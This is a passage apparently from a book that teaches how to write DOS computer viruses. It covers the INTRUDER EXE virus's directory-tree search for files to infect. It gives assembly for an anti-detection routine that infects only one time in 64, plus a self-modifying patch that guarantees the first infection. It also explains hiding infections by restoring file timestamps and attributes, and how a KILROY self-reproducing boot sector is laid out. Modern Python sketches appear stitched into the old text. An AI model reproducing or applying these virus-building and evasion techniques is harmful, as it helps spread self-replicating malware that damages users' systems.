which probably won't match the ID word's required value. In this

way FILE_OK will know that the file has not been infected. So

FILE_OK stays fairly simple.
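The same lookup is what a locator program needs in order to report which files carry the ID word. The following sketch shows the offset calculation from the scanning side. It is an assumption-laden illustration rather than the FINDINT program: the ID value is a placeholder (the real value is not given in this chapter), the function names are ours, and the code ignores EXE files whose Initial cs wraps around 64K.

```python
import struct

# Placeholder only; the actual ID word is not stated in this text.
HYPOTHETICAL_ID = 0x1234


def word_at_initial_cs(data, offset=0):
    """Return the word at Initial cs:offset in the load module, or None."""
    if len(data) < 0x1C:
        return None
    header_paragraphs, = struct.unpack_from("<H", data, 0x08)
    initial_cs, = struct.unpack_from("<H", data, 0x16)
    # The load module starts right after the header; cs counts paragraphs.
    position = 16 * header_paragraphs + 16 * initial_cs + offset
    if position + 2 > len(data):
        return None
    return struct.unpack_from("<H", data, position)[0]


def carries_id(data, id_word=HYPOTHETICAL_ID):
    """True if data looks like an EXE whose code segment starts with id_word."""
    return data[:2] == b"MZ" and word_at_initial_cs(data) == id_word


# Synthetic image: 32-byte header, Initial cs one paragraph into the module.
image = bytearray(32 + 48)
image[0:2] = b"MZ"
struct.pack_into("<H", image, 0x08, 2)
struct.pack_into("<H", image, 0x16, 1)
struct.pack_into("<H", image, 32 + 16, HYPOTHETICAL_ID)
print(carries_id(bytes(image)))
```

As the text notes, a match on a single word is only probable evidence, so a careful scanner would confirm with further checks before reporting a file.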

However, we want to design a much more sophisticated

FIND_FILE procedure than TIMID's. The procedure in TIMID

could only search for files in the current directory to attack. That

was fine for starters, but a good virus should be able to leap from

directory to directory, and even from drive to drive. Only in this

way does a virus stand a reasonable chance of infecting a significant

portion of the files on a system, and jumping from system to system.

To search more than one directory, we need a tree search

routine. That is a fairly common algorithm in programming. We

write a routine FIND_BR, which, given a directory, will search it

for an EXE which will pass FILE_OK. If it doesn't find a file, it

will proceed to search for subdirectories of the currently referenced

directory. For each subdirectory found, FIND_BR will recursively

call itself using the new subdirectory as the directory to perform a

search on. In this manner, all of the subdirectories of any given

directory may be searched for a file to infect. If one specifies the

directory to search as the root directory, then all files on a disk will

get searched.

Making the search too long and involved can be a problem

though. A large hard disk can easily contain a hundred subdirectories

and thousands of files. When the virus is new to the system it

will quickly find an uninfected file that it can attack, so the search

will be unnoticeably fast. However, once most of the files on the

system are already infected, the virus might make the disk whirr

for twenty seconds while examining all of the EXE's on a given

drive to find one to infect. That could be a rather obvious clue that

something is wrong.

To minimize the search time, we must truncate the search

in such a way that the virus will still stand a reasonable chance of

infecting every EXE file on the system. To do that we make use of

the typical PC user's habits. Normally, EXE's are spread pretty

evenly throughout different directories. Users often put frequently

used programs in their path, and execute them from different

directories. Thus, if our virus searches the current directory, and all

of its subdirectories, up to two levels deep, it will stand a good

chance of infecting a whole disk. As added insurance, it can also

search the root directory and all of its subdirectories up to one level

deep. Obviously, the virus will be able to migrate to different drives

and directories without searching them specifically, because it will

attack files on the current drive when an infected program is

executed, and the program to be executed need not be on the current

drive.

When coding the FIND_FILE routine, it is convenient to

structure it in three levels. First is a master routine FIND_FILE,

which decides which subdirectory branches to search. The second

level is a routine which will search a specified directory branch to

a specified level, FIND_BR. When FIND_BR is called, a directory

path is stored as a null terminated ASCII string in the variable

USEFILE, and the depth of the search is specified in LEVEL. At

the third level of the search algorithm, one routine searches for EXE

files (FINDEXE) and two search for subdirectories (FIRSTDIR

and NEXTDIR). The routine that searches for EXE files will call

FILE_OK to determine whether each file it finds is infectable, and

it will stop everything when it finds a good file. The logic of this

searching sequence is illustrated in Figure 12. The code for these

routines is also listed in Appendix B.

[Figure 12: Logic of the file search routines. The diagram shows the routines FIND_FILE, FINDBR, FINDEXE, FILE_OK, FIRSTDIR and NEXTDIR beside a directory tree with ROOT DIR at the top, SUBDIR1 (CURRENT) and SUBDIR2 below it, and the deeper levels SD11 through SD2112.]

Anti-Detection Routines

A fairly simple anti-detection tactic can make this virus

much more difficult for the human eye to locate: Simply don't allow

the search and copy routines to execute every time the virus gets

control. One easy way of doing that is to look at the system clock,

and see if the time in ticks (1 tick = 1/18.2 seconds) modulo some

number is zero. If it is, execute the search and copy routines,

otherwise just pass control to the host program. This anti-detection

routine will look like this:

SHOULDRUN:

xor ah,ah ;read time using

int 1AH ;BIOS time of day service

and al,63

ret

This routine returns with z set roughly one out of 64 times. Since

programs are not normally executed in sync with the clock timer,

it will essentially return a z flag randomly. If called in the main

control routine like this:

call SHOULDRUN

jnz FINISH ;don't infect unless z set

call FIND_FILE

jnz FINISH ;don't infect without valid file

call INFECT

FINISH:

the virus will attack a file only one out of every 64 times the host

program is called. Every other time, the virus will just pass control

to the host without doing anything. When it does that, it will be

completely invisible even to the most suspicious eye.
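The one-in-64 figure follows directly from the mask: a tick count has its low six bits all zero exactly once in every 64 consecutive values. The short check below models only the test as the text describes it (tick count modulo 64); it does not read any clock, and the function name is an invention for the sketch.

```python
def low_bits_clear(ticks, mask=63):
    """True when the bits of ticks selected by mask are all zero."""
    return (ticks & mask) == 0


# Count how many of 64,000 consecutive tick values pass the test.
sample = range(64 * 1000)
hits = sum(1 for ticks in sample if low_bits_clear(ticks))
print(hits, len(sample))
```

At 18.2 ticks per second the low six bits cycle roughly every three and a half seconds, which is why the result is effectively random with respect to when a program is launched.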

The SHOULDRUN routine would pose a problem if you

wanted to go and infect a system with it. You might have to sit there

and run the infected program 50 or 100 times to get the virus to

move to one new file on that system. That is annoying, and problematic

if you want to get it into a system with minimal risk.

Fortunately, a slight change can fix it. Just change SHOULDRUN

to look like this:

SHOULDRUN:

xor ah,ah

SR1: ret

int 1AH

and al,63

ret

and include another routine to modify the SHOULDRUN routine,

SETSR:

mov al,90H ;NOP instruction = 90H

mov BYTE PTR [SR1],al

ret

which can be incorporated into the main control routine like this:

call SHOULDRUN

jnz FINISH

call SETSR

call FIND_FILE

jnz FINISH

call INFECT

FINISH:

After SETSR has been executed, and before INFECT, the

SHOULDRUN routine becomes

SHOULDRUN:

xor ah,ah

SR1: nop

int 1AH

and al,63

ret

since the 90H which SETSR puts at SR1 is just a NOP instruction.

When INFECT copies the virus to a new file, it copies it with the

modified SHOULDRUN procedure. The result is that the first time

the virus is executed, it definitely searches for a file and infects it.

After that it goes to the 1-out-of-64 infection scheme. In this way,

you can take the virus as assembled into the EXE, INTRUDER.EXE,

and run it and be guaranteed to infect something.

After that, the virus will infect the system more slowly.

Another useful tactic that we do not employ here is to make

the first infection very rare, and then more frequent after that. This

might be useful in getting the virus through a BBS, where it is

carefully checked for infectious behavior, and if none is seen, it is

passed around. (That's a hypothetical situation only, please don't

do it!) In such a situation, no one person would be likely to spot the

virus by sitting down and playing with the program for a day or

two, even with a sophisticated virus checker handy. However, if a

lot of people were to pick up a popular and useful (infected)

program that they used daily, they could all end up infected and

spreading the virus eventually.

The tradeoff in restraining the virus to infect only every

one in N times is that it slows the infection rate down. What might

take a day with no restraints may take a week, a month, or even a

year, depending on how often the virus is allowed to reproduce.

There are no clear rules to determine what is best---a quickly

reproducing virus or one that carefully avoids being noticed---it all

depends on what you're trying to do with it.

Another important anti-detection mechanism incorporated

into INTRUDER is that it saves the date and time of the file being

infected, along with its attribute. Then it changes the file attribute

to read/write, performs the modifications on the file, and restores

the original date, time and attribute. Thus, the infected EXE does

not have the date and time of the infection, but its original date and

time. The infection cannot be traced back to its source by studying

the dates of the infected files on the system. Also, since the original

attribute is restored, the archive bit never gets set, so the user who

performs incremental backups does not find all of his EXE's getting

backed up one day (a strange sight indeed). As an added bonus, the

virus can infect read-only and system files without a hitch.

Passing Control to the Host

The final step the virus must take is to pass control to the

host program without dropping the ball. To do that, all the registers

should be set up the same as they would be if the host program were

being executed without the virus. We already discussed setting up

cs:ip and ss:sp. Except for these, only the ax register is set to a

specific value by DOS, to indicate the validity of the drive ID in the

FCB's in the PSP. If an invalid identifier (e.g. ``D:'', when a system

has no D drive) is in the first FCB at 005C, al is set to FF Hex, and

if the identifier is valid, al=0. Likewise, ah is set to FF if the

identifier in the FCB at 006C is invalid. As such, ax can simply be

saved when the virus starts and restored before it transfers control

to the host. The rest of the registers are not initialized by DOS, so

we need not be concerned with them.

Of course, the DTA must also be moved when the virus is

first fired up, and then restored when control is passed to the host.

The host may need to access parameters which are stored

there, so moving the DTA temporarily is essential: it avoids

overwriting those parameters during the search operation.

WARNING

Unlike the TIMID virus, INTRUDER contains no notice

that it is infecting a file. It contains nothing but routines that will

help it reproduce. Although it is not intentionally destructive, it is

extremely infective and easy to overlook. . . and difficult to get rid

of once it gets started. Therefore, DO NOT RUN THIS VIRUS,

except in a very carefully controlled environment. The listing in

Appendix B contains the code for the virus. A locator program,

FINDINT, is also supplied, so if you do run the virus, you'll be able

to see which files have been infected by it.


Case Number Three:

A Simple Boot Sector Virus

The boot sector virus can be the simplest or the most

sophisticated of all computer viruses. On the one hand, the boot

sector is always located in a very specific place on disk. Therefore,

both the search and copy mechanisms can be extremely quick and

simple, if the virus can be contained wholly within the boot sector.

On the other hand, since the boot sector is the first code to gain

control after the ROM startup code, it is very difficult to stop before

it loads. If one writes a boot sector virus with sufficiently sophisticated

anti-detection routines, it can also be very difficult to detect

after it loads, making the virus nearly invincible. In the next two

chapters we will examine both extremes. This chapter will take a

look at one of the simplest of all boot sector viruses to learn the

basics of how they work. The following chapter will dig into the

details of a fairly sophisticated one.

Boot Sectors

To understand the operation of a boot sector virus one must

first understand how a normal, uninfected boot sector works. Since

the operation of a boot sector is hidden from the eyes of a casual

user, and often ignored by books on PCs, we will discuss it

here.

When a PC is first turned on, the CPU begins executing the

machine language code at the location F000:FFF0. The system

BIOS ROM (Basic Input/Output System Read-Only Memory) is

located in this high memory area, so it is the first code to be executed

by the computer. This ROM code is written in assembly language

and stored on chips (EPROMS) inside the computer. Typically this

code will perform several functions necessary to get the computer

up and running properly. First, it will check the hardware to see

what kinds of devices are a part of the computer (e.g., color or mono

monitor, number and type of disk drives) and it will see whether

these devices are working correctly. The most familiar part of this

startup code is the memory test, which cycles through all the

memory in the machine twice, displaying the addresses on the

screen. The startup code will also set up an interrupt table in the

lowest 1024 bytes of memory. This table provides essential entry

points (interrupt vectors) so all programs loaded later can access

the BIOS services. The BIOS startup code also initializes a data

area for the BIOS starting at the memory location 0040:0000H,

right above the interrupt vector table. Once these various housekeeping

chores are done, the BIOS is ready to transfer control to

the operating system for the computer, which is stored on disk.
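The addresses quoted above are all written in the 8086 segment:offset notation. As a minimal sketch of the arithmetic behind them (the helper names `linear_address` and `vector_address` are illustrative and do not come from the book), one might write:

```python
def linear_address(segment: int, offset: int) -> int:
    """Return the 20-bit physical address for a real-mode segment:offset pair."""
    return ((segment << 4) + offset) & 0xFFFFF


def vector_address(interrupt: int) -> int:
    """Return the address of an interrupt vector; each vector occupies 4 bytes."""
    return interrupt * 4


# The reset entry point F000:FFF0 lies 16 bytes below the top of the first megabyte.
print(hex(linear_address(0xF000, 0xFFF0)))
# The BIOS data area at 0040:0000 begins right after the 256 four-byte vectors.
print(hex(linear_address(0x0040, 0x0000)), vector_address(256))
```

The second line of output shows why the data area sits "right above" the table: 256 vectors of 4 bytes each fill exactly the lowest 1024 bytes.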

But which disk? Where on that disk? What does it look

like? How big is it? How should it be loaded and executed? If the

BIOS knew the answers to all of these questions, it would have to

be configured for one and only one operating system. That would

be a problem. As soon as a new operating system (like OS/2) or a

new version of an old familiar (like MS-DOS 4.0) came out, your

computer would become obsolete! For example, a computer set up

with PC-DOS 2.0 could not run MS-DOS 3.3, or Xenix. A machine

set up with CP/M-86 (an old, obsolete operating system) could run

none of the above. That wouldn't be a very pretty picture.

The boot sector provides a valuable intermediate step in

the process of loading the operating system. It works like this: the

BIOS remains ignorant of the operating system you wish to use.

However, it knows to first go out to floppy disk drive A: and attempt

to read the first sector on that disk (at Track 0, Head 0, Sector 1)

into memory at location 0000:7C00H. If the BIOS doesn't find a

disk in drive A:, it looks for the hard disk drive C:, and tries to load


its first sector. (And if it can't find a disk anywhere, it will either

go into ROM Basic or generate an error message, depending on

what kind of a computer it is.) Once the first sector (the boot sector)

has been read into memory, the BIOS checks the last two bytes to

see if they have the values 55H AAH. If so, the BIOS assumes it

has found a valid boot sector, and transfers control to it at

0000:7C00H. From this point on, it is the boot sector's responsibility

to load the operating system into memory and get it going,

whatever the operating system may be. In this way the BIOS (and

the computer manufacturer) avoids having to know anything about

what operating system will run on the computer. Each operating

system will have a unique disk format and its own configuration,

its own system files, etc. As long as every operating system puts a

boot sector in the first sector on the disk, it will be able to load and

run.
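The validity test the BIOS applies is small enough to state in a few lines. The following is only a sketch of that check, assuming a 512-byte sector held in a Python `bytes` object; the function name `has_boot_signature` is made up for illustration.

```python
SECTOR_SIZE = 512


def has_boot_signature(sector: bytes) -> bool:
    """Return True if the last two bytes of the sector are 55H AAH."""
    return len(sector) == SECTOR_SIZE and sector[510:512] == b"\x55\xAA"


# A blank sector fails the check; the same sector with the ID bytes passes.
blank = bytes(SECTOR_SIZE)
signed = bytes(510) + b"\x55\xAA"
print(has_boot_signature(blank), has_boot_signature(signed))
```

Note that the check says nothing about what the other 510 bytes contain, which is exactly why the BIOS can stay ignorant of the operating system.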

Since a sector is normally only 512 bytes long, the boot

sector must be a very small, rude program. Generally, it is designed

to load another larger file or group of sectors from disk and then

pass control to them. Where that larger file is depends on the

operating system. In the world of DOS, most of the operating

system is kept in three files on disk. One is the familiar COMMAND.COM

and the other two are hidden files (hidden by setting

the "hidden" file attribute) which are tucked away on every DOS

boot disk. These hidden files must be the first two files on a disk in

order for the boot sector to work properly. If they are anywhere else,

DOS cannot be loaded from that disk. The names of these files

depend on whether you're using PC-DOS (from IBM) or MS-DOS

(from Microsoft). Under PC-DOS, they're called IBMBIO.COM

and IBMDOS.COM. Under MS-DOS they're called IO.SYS and

MSDOS.SYS.

[Figure 13: Loading the DOS operating system. The ROM BIOS (F000:0000) loads the boot sector into RAM at 0000:7C00; the boot sector loads IBMBIO.COM at 0000:0700.]

When a normal DOS boot sector executes, it first determines

the important disk parameters for the particular disk it is

installed on. Next it checks to see if the two hidden operating system

files are on the disk. If they aren't, the boot sector displays an error

message and stops the machine. If they are there, the boot sector

tries to load the IBMBIO.COM or IO.SYS file into memory at

location 0000:0700H. If successful, it then passes control to that

program file, which continues the process of loading the PC/MS-DOS

operating system. That's all the boot sector on a floppy disk

does.

A hard drive is a little more complex. It will contain two

(or more) boot sectors instead of just one. Since a hard drive can

be divided into more than one partition (an area on the disk for the

use of an operating system), it may contain several different operating

systems. When the BIOS loads the boot sector in the first

physical sector on the hard drive, it treats it just the same as a floppy

drive. However, the sector that gets loaded performs a completely

different function. Rather than loading an operating system's code,

this sector handles the partition information, which is also stored

in that sector (by the FDISK program in DOS). No matter how

many partitions a disk may have, one of them must be made active

(by setting a byte in the partition table) to boot off the hard disk.

The first boot sector determines which partition is active, moves

itself to a different place in memory, and then loads the first sector

in the active partition into memory (at 0000:7C00H), where the

partition boot sector originally was. The first sector in the active

partition is the operating system boot sector which loads the operating

system into memory. It is virtually identical to the boot sector

on floppy disk.
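To make the "active partition" test concrete, here is a minimal sketch of how the partition table in the first sector can be read. It assumes the standard PC layout, which the text above does not spell out: four 16-byte entries starting at offset 1BE Hex, with the first byte of an entry set to 80 Hex when the partition is active and the next three bytes holding the starting head, sector and cylinder. The function name is illustrative.

```python
PARTITION_TABLE_OFFSET = 0x1BE  # standard location of the table (assumed)
ENTRY_SIZE = 16
ENTRY_COUNT = 4


def find_active_partition(sector: bytes):
    """Return (index, (cylinder, head, sector)) of the active entry, or None."""
    for index in range(ENTRY_COUNT):
        start = PARTITION_TABLE_OFFSET + index * ENTRY_SIZE
        entry = sector[start:start + ENTRY_SIZE]
        if entry[0] == 0x80:  # boot indicator byte marks the active partition
            head = entry[1]
            sec = entry[2] & 0x3F  # low six bits hold the sector number
            cylinder = ((entry[2] & 0xC0) << 2) | entry[3]
            return index, (cylinder, head, sec)
    return None


# A made-up table whose first entry is active and starts at
# cylinder 0, head 1, sector 1.
example = bytearray(512)
example[0x1BE:0x1BE + 4] = bytes([0x80, 1, 1, 0])
print(find_active_partition(bytes(example)))
```

The location returned for the active entry is where the partition boot sector goes to fetch the operating system boot sector.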

Designing a boot sector virus can be fairly simple---at least

in principle. All that such a virus must do is take over the first sector

on disk (or the first sector in the active partition of a hard disk, if it

prefers to go after that). From there, it tries to find uninfected disks

in the system. Problems arise when that virus becomes so complicated

that it takes up too much room. Then the virus must become

two or more sectors long, and the author must find a place to hide

multiple sectors, load them, and copy them. This can be a messy

and difficult job. If a single sector of code could be written that

could both load the DOS operating system and copy itself to other

disks, one would have a very simple virus which would be practically

impossible for the unsuspecting user to detect. Such is the

virus we will discuss in this chapter. Its name is KILROY.

Rather than designing a virus that will infect a boot sector,

it is much easier to design a virus that simply is a self-reproducing

boot sector. That is because boot sectors are pretty cramped (there

may only be a dozen free bytes available for "other code") and the

layout of the boot sector will vary with different operating systems.

To deal with these variations in such a limited amount of space

would take a miracle program. Instead, we will design a whole,

functional boot sector.

[Figure 14: The hard disk boot sequence in three steps. (1) BIOS loads the partition boot sector (7C00). (2) The partition boot sector (0600) loads the DOS boot sector (7C00). (3) The DOS boot sector loads DOS (IO.SYS, 0700).]

The Necessary Components of a Boot Sector

To write a boot sector that can both boot up the DOS

operating system and reproduce means we are going to have to trim

down on some of what a normal boot sector does. The KILROY

virus won't display the polite little error messages like "Non-System

disk or disk error / Replace and strike any key when ready"

when your disk isn't configured properly. Instead, it will be real

rude to the user if everything isn't just right. That will make room

for the code necessary to carry out covert operations.

To start with, let's take a look at the basic structure of a

boot sector. The first bytes in the sector are always a jump instruction

to the real start of the program, followed by a bunch of data

about the disk on which this boot sector resides. In general, this

data changes from disk type to disk type. All 360K disks will have

the same data, but that will differ from 1.2M drives and hard drives,

etc. The standard data for the start of the boot sector is described

in Table 2. It consists of a total of 43 bytes of information. Most of

this information is required in order for DOS and the BIOS to use

the disk drive and it should never be changed inadvertently. The one

exception is the DOS_ID field. This is simply eight bytes to put a

name in to identify the boot sector. We'll put "Kilroy" there.

Right after the jump instruction, the boot sector sets up the

stack. Next, it sets up the Disk Parameter Table also known as the

Disk Base Table. This is just a table of parameters which the BIOS

uses to control the disk drive (Table 3) through the disk drive

controller (a chip on the controller card). More information on these

parameters can be found in Peter Norton's Programmer's Guide to

the IBM PC, and similar books. When the boot sector is loaded, the

BIOS has already set up a default table, and put a pointer to it at

the address 0000:0078H (interrupt 1E Hex). The boot sector replaces

this table with its own, tailored for the particular disk. This

is standard practice, although in many cases the BIOS table is

perfectly adequate to access the disk.

Name            Position  Size     Description
DOS_ID          7C03      8 bytes  ID of Format program
SEC_SIZE        7C0B      2        Sector size, in bytes
SECS_PER_CLUST  7C0D      1        Number of sectors per cluster
FAT_START       7C0E      2        Starting sector for the 1st FAT
FAT_COUNT       7C10      1        Number of FATs on the disk
ROOT_ENTRIES    7C11      2        Number of entries in root directory
SEC_COUNT       7C13      2        Number of sectors on this disk
DISK_ID         7C15      1        Disk ID (FD Hex = 360K, etc.)
SECS_PER_FAT    7C16      2        Number of sectors in a FAT table
SECS_PER_TRK    7C18      2        Number of sectors on a track
HEADS           7C1A      2        Number of heads (sides) on disk
HIDDEN_SECS     7C1C      2        Number of hidden sectors

Table 2: The Boot Sector data.

Offset  Description
0       Specify Byte 1: head unload time, step rate time
1       Specify Byte 2: head load time, DMA mode
2       Time before turning motor off, in clock ticks
3       Bytes per sector (0=128, 1=256, 2=512, 3=1024)
4       Last sector number on a track
5       Gap length between sectors for read/write
6       Data transfer length (set to FF Hex)
7       Gap length between sectors for formatting
8       Value stored in each byte when a track is formatted
9       Head settle time, in milliseconds
A       Motor startup time, in 1/8 second units

Table 3: The Disk Parameter Table.
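The disk data at the start of the boot sector can be pulled apart with a few lines of code. The sketch below is an illustration only: it assumes the usual DOS 3.x layout, in which the fields follow one another without gaps from offset 0B Hex of the sector (7C0B in memory), and the sample values are those of a 360K diskette. The names `BPB_FORMAT`, `BPB_FIELDS` and `parse_boot_data` are made up for this example.

```python
import struct

# Little-endian, no padding: word, byte, word, byte, word, word, byte, then four words.
BPB_FORMAT = "<HBHBHHBHHHH"
BPB_FIELDS = (
    "SEC_SIZE", "SECS_PER_CLUST", "FAT_START", "FAT_COUNT", "ROOT_ENTRIES",
    "SEC_COUNT", "DISK_ID", "SECS_PER_FAT", "SECS_PER_TRK", "HEADS",
    "HIDDEN_SECS",
)


def parse_boot_data(sector: bytes) -> dict:
    """Decode the disk data that follows the 3-byte jump in a boot sector."""
    values = struct.unpack_from(BPB_FORMAT, sector, 0x0B)
    info = dict(zip(BPB_FIELDS, values))
    info["DOS_ID"] = sector[3:11].decode("ascii", errors="replace")
    return info


# Build a sample sector carrying the values of a 360K diskette.
sample = bytearray(512)
sample[3:11] = b"IBM  3.3"
struct.pack_into(BPB_FORMAT, sample, 0x0B, 512, 2, 1, 2, 112, 720, 0xFD, 2, 9, 2, 0)
for name, value in parse_boot_data(bytes(sample)).items():
    print(name, value)
```

Reading the fields by name in this way makes the calculations later in the chapter easier to follow.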

Rather than simply changing the address of the interrupt

1EH vector, the boot sector goes through a more complex procedure

that allows the table to be built both from the data in the boot sector

and the data set up by the BIOS. It does this by locating the BIOS

default table and reading it byte by byte, along with a table stored

in the boot sector. If the boot sector's table contains a zero in any

given byte, that byte is replaced with the corresponding byte from

the BIOS's table, otherwise the byte is left alone. Once the new table

is built inside the boot sector, the boot sector changes interrupt

vector 1EH to point to it. Then it resets the disk drive through BIOS

interrupt 13H, function 0, using the new parameter table.
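The byte-by-byte merge just described is easy to model. This is a sketch of the rule only, not the boot sector's actual code: the function name is invented and the two eleven-byte tables below hold made-up values chosen to show both cases.

```python
def merge_parameter_tables(boot_table: bytes, bios_table: bytes) -> bytes:
    """Keep each non-zero boot sector byte; fill zero bytes from the BIOS table."""
    if len(boot_table) != len(bios_table):
        raise ValueError("tables must be the same length")
    return bytes(b if b != 0 else d for b, d in zip(boot_table, bios_table))


# Illustrative values only. Zeros in the boot sector's table mean
# "use whatever the BIOS default is".
bios_default = bytes([0xDF, 0x02, 0x25, 0x02, 0x09, 0x2A, 0xFF, 0x50, 0xF6, 0x0F, 0x02])
boot_sector = bytes([0x00, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00])
print(merge_parameter_tables(boot_sector, bios_default).hex(" "))
```

In this example only offset 4 (last sector number on a track) and offset 9 (head settle time) come from the boot sector; every other byte is inherited from the BIOS.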

The next step, locating the system files, is done by finding

the start of the root directory on disk and looking at it. The disk data

at the start of the boot sector has all the information we need to

calculate where the root directory starts. Specifically,

FRDS (First root directory sector) = FAT_COUNT*SECS_PER_FAT

+ HIDDEN_SECS + FAT_START

so we can calculate the sector number and read it into memory at

0000:0500H. From there, the boot sector looks at the first two

directory entries on disk. These are just 32-byte records, the first

eleven bytes of which are the file name. One can easily compare these

eleven bytes with file names stored in the boot record. Typical code

for this whole operation looks like this:

LOOK_SYS:
        MOV     AL,BYTE PTR [FAT_COUNT]         ;get fats per disk
        XOR     AH,AH
        MUL     WORD PTR [SECS_PER_FAT]         ;multiply by sectors per fat
        ADD     AX,WORD PTR [HIDDEN_SECS]       ;add hidden sectors
        ADD     AX,WORD PTR [FAT_START]         ;add starting fat sector
        PUSH    AX
        MOV     WORD PTR [DOS_ID],AX            ;root dir, save it
        MOV     AX,20H                          ;dir entry size
        MUL     WORD PTR [ROOT_ENTRIES]         ;dir size in ax
        MOV     BX,WORD PTR [SEC_SIZE]          ;sector size
        ADD     AX,BX                           ;add one sector
        DEC     AX                              ;decrement by 1
        DIV     BX                              ;ax=# sectors in root dir
        ADD     WORD PTR [DOS_ID],AX            ;DOS_ID=start of data
        MOV     BX,OFFSET DISK_BUF              ;set up disk read buffer @ 0:0500
        POP     AX                              ;and go convert sequential
        CALL    CONVERT                         ;sector number to bios data
        MOV     AL,1                            ;prepare for a 1 sector disk read
        CALL    READ_DISK                       ;go read it
        MOV     DI,BX                           ;compare first file on disk with
        MOV     CX,11                           ;required file name
        MOV     SI,OFFSET SYSFILE_1             ;of first system file for PC DOS
        REPZ    CMPSB
        JZ      SYSTEM_THERE                    ;ok, found it, go load it
        MOV     DI,BX                           ;compare first file with
        MOV     CX,11                           ;required file name
        MOV     SI,OFFSET SYSFILE_2             ;of first system file for MS DOS
        REPZ    CMPSB
ERROR2:
        JNZ     ERROR2                          ;not the same: an error, so stop
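The sector arithmetic in this listing can be checked by hand with a short sketch. The functions below mirror the first-root-directory-sector formula and the rounding-up division the listing performs; `to_track_head_sector` is only the usual conversion from a sequential sector number to BIOS track, head and sector values, offered as an assumption about what a routine like CONVERT has to do, since that routine is not shown here. The sample numbers are those of a 360K diskette.

```python
def first_root_dir_sector(fat_count, secs_per_fat, hidden_secs, fat_start):
    """FRDS = FAT_COUNT*SECS_PER_FAT + HIDDEN_SECS + FAT_START."""
    return fat_count * secs_per_fat + hidden_secs + fat_start


def root_dir_sectors(root_entries, sec_size):
    """Sectors occupied by the root directory (32 bytes per entry), rounded up."""
    return (32 * root_entries + sec_size - 1) // sec_size


def to_track_head_sector(sector_number, secs_per_trk, heads):
    """Convert a zero-based sequential sector number to (track, head, sector)."""
    track, remainder = divmod(sector_number, secs_per_trk * heads)
    head, sector = divmod(remainder, secs_per_trk)
    return track, head, sector + 1  # BIOS sector numbers start at 1


# 360K diskette: 2 FATs of 2 sectors, no hidden sectors, FAT starts at sector 1,
# 112 root entries, 512-byte sectors, 9 sectors per track, 2 heads.
frds = first_root_dir_sector(2, 2, 0, 1)
data_start = frds + root_dir_sectors(112, 512)
print(frds, to_track_head_sector(frds, 9, 2))              # 5 (0, 0, 6)
print(data_start, to_track_head_sector(data_start, 9, 2))  # 12 (0, 1, 4)
```

So on a 360K diskette the root directory begins at sequential sector 5 and the data area at sector 12, which is the value the listing leaves in DOS_ID.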

Once the boot sector has verified that the system files are

on disk, it tries to load the first file. It assumes that the first file is

located at the very start of the data area on disk, in one contiguous

block. So to load it, the boot sector calculates where the start of the

data area is,

FDS (First Data Sector) = FRDS

+ [(32*ROOT_ENTRIES) + SEC_SIZE - 1]/SEC_SIZE

and the size of the file in sectors. The file size in bytes is stored at

the offset 1CH from the start of the directory entry at 0000:0500H.

The number of sectors to load is at most

SIZE IN SECTORS = (SIZE_IN_BYTES/SEC_SIZE) + 1

(Note that the size of this file is always less than 29K or it cannot

be loaded.) The file is loaded at 0000:0700H. Then the boot sector

sets up some parameters for that system file in its registers, and

transfers control to it. From there the operating system takes over

the computer, and eventually the boot sector's image in memory is

overwritten by other programs.

Position  Size     Description
00 Hex    8 bytes  File Name (ASCII, space filled)
08        3        File Name Extension (ASCII, space filled)
0B        1        File Attribute
0C        10       Reserved, Zero filled
16        2        Time file last written to
18        2        Date file last written to
1A        2        Starting FAT entry
1C        4        File size (long integer)

Table 4: The format of a directory entry on disk.
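A 32-byte directory entry maps neatly onto a fixed record, so the file-name comparison and the size calculation can be sketched in a few lines. This is an illustration under stated assumptions: the function and field names are invented, the sample entry is made up (its file size is arbitrary), and `sectors_to_load` simply applies the upper bound SIZE_IN_BYTES/SEC_SIZE + 1 quoted in the text.

```python
import struct

# name(8) ext(3) attribute(1) reserved(10) time(2) date(2) start(2) size(4) = 32 bytes
DIR_ENTRY_FORMAT = "<8s3sB10sHHHI"


def parse_dir_entry(entry: bytes) -> dict:
    """Decode one 32-byte directory entry."""
    name, ext, attr, _reserved, time, date, start, size = struct.unpack(
        DIR_ENTRY_FORMAT, entry[:32]
    )
    return {"name": name + ext, "attribute": attr, "time": time,
            "date": date, "start": start, "size": size}


def sectors_to_load(size_in_bytes: int, sec_size: int) -> int:
    """Upper bound on the number of sectors the file occupies."""
    return size_in_bytes // sec_size + 1


# A made-up entry for IO.SYS: read-only + hidden + system, arbitrary size.
sample = struct.pack(DIR_ENTRY_FORMAT, b"IO      ", b"SYS", 0x07, bytes(10), 0, 0, 2, 16138)
entry = parse_dir_entry(sample)
print(entry["name"] == b"IO      SYS", sectors_to_load(entry["size"], 512))
```

The eleven-byte `name` value is what gets compared against the file names stored in the boot record, and the size field sits at offset 1C Hex as described above.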

Gutting Out the Boot Sector

The first step in creating a one sector virus is to write

code that performs all of the basic boot sector functions and is as

code-efficient as possible. All of the functionality discussed above

is needed, but it's not what we're really interested in. So we will

strip out all the fancy bells and whistles that are typically included

in a boot sector. First, we want to do an absolute minimum of error

handling. The usual boot sector displays several error messages to

help the user to try to remedy a failure. Our boot sector virus won't

be polite. It doesn't really care what the user does when the boot

up fails, so if something goes wrong, it will just stop. Whoever is

using the computer will get the idea that something is wrong and

try a different disk anyhow. This rudeness eliminates the need for

error message strings, and the code required to display them. That

can save up to a hundred bytes.

The second point of rudeness we will incorporate into our

boot sector virus is that it will only check the disk for the first system

file and load it. Rarely is one system file present and not the other,

since both DOS commands that put them on a disk (FORMAT and

SYS) put them there together. If for some reason the second file

does not exist, our boot sector will load and execute the first one,

rather than displaying an error message. The first system program

will just bomb then when it goes to look for the second file and it's

not there. The result is practically the same. Trimming the boot

sector in this fashion makes it necessary to search for only two files

instead of four, and saves about 60 bytes.

Two files instead of four? Didn't I just say that the boot

sector only looks for the two system files to begin with? True, most

boot sectors do, but a viral boot sector must be different. The usual

boot sector is really part of an operating system, but the viral boot

sector is not. It will typically jump from disk to disk, and it will not

know what operating system is on that disk. (And there's not


enough room in one sector to put in code that could figure it out

and make an intelligent choice.) So our solution will be to assume

that the operating system could be either MS-DOS or PC-DOS and

nothing else. That means we must look for system files for both

MS-DOS and PC-DOS, four files in all. Limiting the search to the first

system file means that we only have to find IO.SYS or

IBMBIO.COM.

Anyhow, incorporating all of these shortcuts into a boot

sector results in 339 bytes of code, which leaves 173 bytes for the

search and copy routines. That is more than enough room. The

